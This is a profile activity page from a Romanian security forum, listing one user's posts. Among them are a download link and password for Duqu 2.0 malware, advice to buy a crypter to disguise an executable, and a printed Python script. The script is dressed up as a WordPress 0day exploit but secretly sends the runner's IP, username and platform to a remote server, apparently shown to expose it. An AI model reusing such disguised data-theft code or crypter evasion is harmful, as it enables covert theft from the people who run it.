-
Posts
2175 -
Joined
-
Last visited
-
Days Won
30
Everything posted by Byte-ul
-
Am decis sa-l uploadez pe Pufi, botul facut pentru chat ( banat de Gecko ), pe github. https://github.com/Caydenz/Pufi---Ajax-Chat-Bot Oricine poate sa contribuie la el Unele chestii sunt scrise foarte aiurea, o sa le fixez in timp.
-
Deci Rickets chiar vrea sa invete ceva spre deosebire de Aerosol. Altceva nu am de zis.
-
Citeste primul post. Scrie tot acolo.
-
Va costa 5 BTC. PM daca sunteti interesati.
- 24 replies
-
Sunt ceva posturi la care inca este nevoie sa dai like pentru a le vedea. Se poate scoate? https://rstforums.com/forum/94546-rst-cycler-bot.rst https://rstforums.com/forum/96128-rst-instagram-scrapper.rst https://rstforums.com/forum/86635-chill-tv-org-tv-online.rst https://rstforums.com/forum/97187-tocmai-ro-scraper-numar-telefon-localitate-nume.rst (probabil mai sunt, pe astea le-am gasit rapid)
-
[VB.net]CPU load-ul procesului deschis de aplicatia mea
Byte-ul replied to Rickets's topic in Programare
Public Class Form1 Private ReadOnly _ _performanceCounter As _ New PerformanceCounter("Process", "% Processor Time", GetProcessInstanceName(Process.GetCurrentProcess.Id)) Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click Timer1.Start() End Sub Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick Dim asd = CInt(_performanceCounter.NextValue() / Environment.ProcessorCount).ToString & "%" Label1.Text = asd End Sub Private Shared Function GetProcessInstanceName(pid As Integer) As String Dim cat As New PerformanceCounterCategory("Process") Dim instances As String() = cat.GetInstanceNames() For Each instance As String In instances Using cnt As New PerformanceCounter("Process", "ID Process", instance, True) Dim val = CInt(cnt.RawValue) If val = pid Then Return instance End If End Using Next Throw _ New Exception( "Could not find performance counter " + "instance name for current process. This is truly strange ...") End Function End Class asta merge. -
Download: duqu 2.0.rar pass: virus
- 3 replies
-
- 1
-
- download
- http://ge.tt/5omxp6j2/v/0
-
(and 3 more)
Tagged with:
-
E acelasi caracter de un milion de ori. Ar fi trebuit sa fie mult mai mic daca se utiliza o compresie potrivita.
-
Got Chrome? Google Just Silently Downloaded This Onto Your Computer
Byte-ul replied to wildchild's topic in Stiri securitate
Pai o am instalata pe laptop, deci probabil nu -
Got Chrome? Google Just Silently Downloaded This Onto Your Computer
Byte-ul replied to wildchild's topic in Stiri securitate
E si in ultimul release. -
ICANN proposes websites associated to "commercial activity" will no longer be able to use WHOIS protection services. Under new guidelines proposed by MarkMonitor and others who represent the same industries that backed SOPA, domain holders with sites associated to "commercial activity" will no longer be able to protect their private information with WHOIS protection services. "Commercial activity" casts a wide net, which means that a vast number of domain holders will be affected. Your privacy provider could be forced to publish your contact data in WHOIS or even give it out to anyone who complains about your website, without due process. Why should a small business owner have to publicize her home address just to have a website? We think your privacy should be protected, regardless of whether your website is personal or commercial, and your confidential info should not be revealed without due process. If you agree, it’s time to tell ICANN. To view the new proposed rules, visit: Privacy & Proxy Services Accreditation Issues Policy. Source: https://www.respectourprivacy.com/
- 3 replies
-
- activity
- commercial
-
(and 3 more)
Tagged with:
-
# Embedded file name: test.py import sys import uuid from md5 import md5 from urllib2 import urlopen import platform import os import time x = '[+] password: ' + md5(str(uuid.uuid4())).hexdigest() x1 = 'http://46.101.188.181/a.php?t=' + urlopen('http://ip.42.pl/raw').read() + '_' + os.getenv('USERNAME') + '_' + platform.platform() x2 = urlopen(x1).read() if len(sys.argv) == 1: sys.exit('No argument specified') print 'Wordpress 4.2.2 0day exploit' time.sleep(2) print '[+] Trying: %s' % str(sys.argv[1]) time.sleep(5) print '[+] user: admin' time.sleep(3) print x
-
Folosesti un crypter. Poti cumpara de aici: Hack Forums - Site Challenge
-
Pentru ca executabilul pe care il generezi cu "Coailii Password Recovery.exe" o sa trimita informatiile acolo.
-
Nimic. Tu le dai .exe-ul generat de program si ei trebuie sa-l ruleze.
-
Da
- 9 replies
-
- care
- duplicates
-
(and 3 more)
Tagged with:
-
<nu mai functioneaza>
- 9 replies
-
- 2
-
- care
- duplicates
-
(and 3 more)
Tagged with: